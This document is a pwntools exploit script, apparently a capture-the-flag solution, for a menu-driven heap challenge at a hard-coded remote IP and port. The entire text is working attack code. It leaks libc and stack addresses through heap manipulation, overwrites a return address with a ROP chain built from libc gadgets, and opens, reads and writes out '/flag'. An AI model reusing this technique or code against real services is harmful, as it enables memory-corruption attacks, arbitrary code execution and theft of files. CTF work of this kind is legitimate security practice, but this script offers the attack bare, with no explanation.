1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107
| from pwn import *
io = remote('123.60.179.52', 30307) context.binary = 'pwn' libc = ELF('libc.so.6', checksec = False)
rc = lambda n : io.recv(n) ru = lambda x : io.recvuntil(x, drop = True) sa = lambda a, b : io.sendafter(a, b) sla = lambda a, b : io.sendlineafter(a, b) ia = lambda : io.interactive() uu64 = lambda x : u64(x.ljust(8, '\x00')) libc_os = lambda x : libc_base + x libc_sym = lambda x : libc_os(libc.sym[x])
def menu(choice): sla('>>', str(choice))
def add(size, content): menu(1) sla('Pls input the size:\n', str(size)) sa('Pls input Content:\n', content)
def delete(idx): menu(2) sla('Please input the idx:\n', str(idx))
def edit(idx, content): menu(3) sla('Please input the idx:\n', str(idx)) sa('Pls input the Content:\n', content)
def show(idx): menu(4) sla('Please input the idx:\n', str(idx))
for i in range(2): add(0x500, 'a') for i in range(4): delete(0) add(0x500, 'a') edit(0, 'aa') show(0) leak = uu64(ru('\n')) leak = leak >> 16 << 16 leak_libc_addr = leak - (0x4297c020000 - 0x4297c000210) edit(0, flat(leak_libc_addr)) add(0x500, 'a') pld = flat({0x30: 'a'}) add(0x500, pld) show(4) rc(0x30) libc_base = uu64(ru('\n')) - 0x214861 environ = libc_sym('environ') pld = flat([ 1, 0x3300030002, environ - 0x10, 0x50000000002, 0, 0, 0x7f4a25193820 ]) edit(4, pld) add(0x500, 'a' * 0x10) show(5) rc(0x10) stack_addr = uu64(ru('\n')) ret_addr = stack_addr - (0x7ffde5436a68 - 0x7ffde5436948) pld = flat([ 1, 0x3300030002, ret_addr, 0x50000000002, 0, 0, 0x7f4a25193820 ]) edit(4, pld) read_addr = libc_sym('read') write_addr = libc_sym('write') open_addr = libc_sym('open') pop_rdi = libc_os(0x0000000000023b6a) pop_rsi = libc_os(0x000000000002601f) pop_rdx = libc_os(0x0000000000142c92) flag_addr = ret_addr + 0x78 rop_chain = flat([ pop_rdi, flag_addr, pop_rsi, 0, open_addr, pop_rdi, 3, pop_rsi, ret_addr + 0x100, pop_rdx, 0x50, read_addr, pop_rdi, 1, write_addr ]) rop_chain += '/flag\x00' add(0x500, rop_chain) ia()
|